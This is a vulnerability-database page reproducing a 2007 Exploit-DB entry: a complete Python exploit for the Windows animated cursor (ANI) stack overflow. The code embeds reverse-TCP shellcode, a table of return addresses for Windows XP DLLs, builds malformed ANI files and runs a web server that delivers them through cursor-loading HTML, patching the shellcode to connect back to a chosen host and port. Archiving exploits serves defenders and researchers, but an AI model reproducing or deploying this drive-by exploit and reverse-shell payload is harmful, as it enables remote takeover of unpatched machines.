Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows - Animated Cursor Stack Overflow

🗓️ 07 Jun 2007 00:00:00Reported by RISE SecurityType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 48 Views

Windows Animated Cursor Stack Overflow Exploi

Code
#!/usr/bin/env python

#
#   $Id: win32-loadaniicon.py 4 2007-06-02 00:47:59Z ramon $
#
#   Windows Animated Cursor Stack Overflow Exploit
#   Copyright 2007 Ramon de Carvalho Valle <[email protected]>,
#   RISE Security <[email protected]>
#
#   This program is free software; you can redistribute it and/or modify
#   it under the terms of the GNU General Public License as published by
#   the Free Software Foundation; either version 2 of the License, or
#   (at your option) any later version.
#
#   This program is distributed in the hope that it will be useful,
#   but WITHOUT ANY WARRANTY; without even the implied warranty of
#   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#   GNU General Public License for more details.
#
#   You should have received a copy of the GNU General Public License
#   along with this program; if not, write to the Free Software
#   Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
#

#
# Windows Animated Cursor Stack Overflow Vulnerability
# http://www.determina.com/security.research/vulnerabilities/ani-header.html
#

from BaseHTTPServer import *
from os.path import *
from random import *
from socket import *
from string import *
from struct import *
from sys import *

#
#  windows/shell_reverse_tcp - 287 bytes
#  http://www.metasploit.com
#  EXITFUNC=seh, LPORT=1234, LHOST=127.0.0.1
#
buf = \
'\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b' + \
'\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01' + \
'\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07' + \
'\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f' + \
'\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b' + \
'\x89\x6c\x24\x1c\x61\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c' + \
'\x8b\x70\x1c\xad\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff' + \
'\xd6\x66\x53\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0' + \
'\x68\xcb\xed\xfc\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08' + \
'\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53' + \
'\x53\x53\x53\x43\x53\x43\x53\xff\xd0\x68\x7f\x00\x00\x01\x66' + \
'\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xec\xf9\xaa\x60\x57\xff' + \
'\xd6\x6a\x10\x51\x55\xff\xd0\x66\x6a\x64\x66\x68\x63\x6d\x6a' + \
'\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\x95' + \
'\x89\xfd\xfe\x42\x2d\xfe\x42\x2c\x8d\x7a\x38\xab\xab\xab\x68' + \
'\x72\xfe\xb3\x16\xff\x75\x28\xff\xd6\x5b\x57\x52\x51\x51\x51' + \
'\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53\xff' + \
'\xd6\x6a\xff\xff\x37\xff\xd0\x68\xe7\x79\xc6\x79\xff\x75\x04' + \
'\xff\xd6\xff\x77\xfc\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6' + \
'\xff\xd0'

# Target list
target = [ \
    # call [ebx+4]

    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2622) Multi Language
    {'addr': 0x25ba, 'len': 2, 'offset': 80},

    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language
    {'addr': 0x25d0, 'len': 2, 'offset': 80},

    # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) English
    {'addr': 0x769fc81a, 'len': 4, 'offset': 80},

    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) English
    # {'addr': 0x77d825d0, 'len': 4, 'offset': 80},

    # Microsoft Windows XP SP2 userenv.dll (5.1.2600.2180) Portuguese (Brazil)
    {'addr': 0x769dc81a, 'len': 4, 'offset': 80},

    # Microsoft Windows XP SP2 user32.dll (5.1.2600.2180) Portuguese (Brazil)
    # {'addr': 0x77d625d0, 'len': 4, 'offset': 80},

    # call [esi+4]

    # Microsoft Windows XP SP1a userenv.dll English
    {'addr': 0x75a758b1, 'len': 4, 'offset': 80},

    # Microsoft Windows XP SP1a shell32.dll English
    # {'addr': 0x77441a66, 'len': 4, 'offset': 80},

    # Microsoft Windows XP userenv.dll (5.1.2600.0) Portuguese (Brazil)
    {'addr': 0x75a4579b, 'len': 4, 'offset': 80},

    # Microsoft Windows XP shell32.dll (6.0.2600.0) Portuguese (Brazil)
    # {'addr': 0x77427214, 'len': 4, 'offset': 80},
]

# Target list index
tidx = 0

def randstr(count = 1, charset = 'ascii_alpha'):
    # Set the charset
    if charset == 'ascii_alpha':
        charset = digits + ascii_uppercase + ascii_lowercase
    elif charset == 'ascii_letters':
        charset = ascii_letters
    elif charset == 'ascii_lowercase':
        charset = ascii_lowercase
    elif charset == 'ascii_uppercase':
        charset = ascii_uppercase
    elif charset == 'digits':
        charset = digits
    elif charset == 'hexdigits':
        charset = hexdigits
    elif charset == 'octdigits':
        charset = octdigits

    # Create the string
    i = 0
    str = ''

    while i < count:
        str = str + charset[randint(0, len(charset)-1)]
        i = i + 1

    return str


def riff_chunk():
    chunk_id = randstr(4)
    chunk_data = randstr(randint(1, 256)*2)
    chunk_size = pack('<L', len(chunk_data))

    return chunk_id + chunk_size + chunk_data


def riff_ani_file():
    global buf, target, tidx

    # Create the first header subchunk
    anih_a = [36, randint(1, 65535), randint(1, 65535), 0, 0, 0, 0, 0, 1]
    anih_a = pack('<%dL' % len(anih_a), *[i for i in anih_a])
    anih_a = 'anih' + pack('<L', len(anih_a)) + anih_a

    # Create the second header subchunk
    anih_b = randstr(target[tidx]['offset'])

    # Set the current indexed target
    if target[tidx]['len'] == 1:
        anih_b = anih_b + pack('<B', target[tidx]['addr'])
    elif target[tidx]['len'] == 2:
        anih_b = anih_b + pack('<H', target[tidx]['addr'])
    else:
        anih_b = anih_b + pack('<L', target[tidx]['addr'])

    anih_b = 'anih' + pack('<L', len(anih_b)) + anih_b

    # Format ID
    riff = 'ACON'

    # Random subchunks
    for i in range(randint(1, 256)):
        riff = riff + riff_chunk()

    # First header subchunk
    riff = riff + anih_a

    # Random subchunks
    for i in range(randint(1, 256)):
        riff = riff + riff_chunk()

    # Second header subchunk
    riff = riff + anih_b

    # Shellcode
    riff = riff + buf

    # File ID and length of file
    riff = 'RIFF' + pack('<L', len(riff)) + riff

    # Update the target list index
    if tidx < len(target)-1:
        tidx = tidx + 1
    else:
        tidx = 0

    return riff


def randhtml():
    global buf, target, tidx

    # Random RIFF file extensions
    extension = ['ani', 'avi', 'cdr', 'rmi', 'wav']

    # Random html document
    html = \
    '<html>\n<head>\n<title>' + \
    randstr(randint(1, 256)) + \
    '</title>\n</head>\n<body>\n'

    for i in range(randint(0, 4)):
        html = html + randstr(randint(1, 256)) + '\n'

    for i in range(len(target)):
        html = html + \
        '<div id="' + randstr(randint(4, 16)) + '" ' \
        'style="cursor: url(/' + randstr(randint(4, 16)) + '.' + \
        extension[randint(0, len(extension)-1)] + ')">\n'

        for i in range(randint(0, 4)):
            html = html + randstr(randint(1, 256)) + '\n'

        html = html + '</div>\n'

        for i in range(randint(0, 4)):
            html = html + randstr(randint(1, 256)) + '\n'

    html = html + '</body>\n</html>\n'

    return html


class RequestHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        self.send_response(200)

        if self.path == '/':
            # Send the html document
            html = randhtml()
            self.send_header('Content-Type', 'text/html; charset=UTF-8')
            self.send_header('Content-Length', str(len(html)))
            self.end_headers()
            self.wfile.write(html)
            return

        # Generate and send the RIFF file
        riff = riff_ani_file()
        self.send_header('Content-Type', 'application/octetstream')
        self.send_header('Content-Length', str(len(riff)))
        self.end_headers()
        self.wfile.write(riff)


def usage():
    print 'Usage: ./%s <http_host> <http_port> <host> <port>' \
    % basename(argv[0])


if __name__ == '__main__':
    print 'Windows Animated Cursor Stack Overflow Exploit'
    print 'Copyright 2007 RISE Security <[email protected]>\n'

    args = argv[1:]

    if '-h' in args or '--help' in args:
        usage()
        exit()

    http_host = '0.0.0.0'
    http_port = 8080
    host = '127.0.0.1'
    port = 1234

    try:
        http_host = argv[1]
        http_port = atoi(argv[2])
        host = argv[3]
        port = atoi(argv[4])
    except:
        pass

    # Set shellcode host and port to connect to
    buf = buf[:160] + inet_aton(gethostbyname(host)) + buf[164:]
    buf = buf[:166] + pack('<H', port) + buf[168:]

    # Start the HTTP server
    server_class = HTTPServer
    httpd = server_class((http_host, http_port), RequestHandler)

    print 'Listening on %s:%s' % (http_host, http_port)

    try:
        httpd.serve_forever()
    except:
        pass

# milw0rm.com [2007-06-07]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
07 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
microsoft windowsstack overflowanimated cursorexploitrise security
48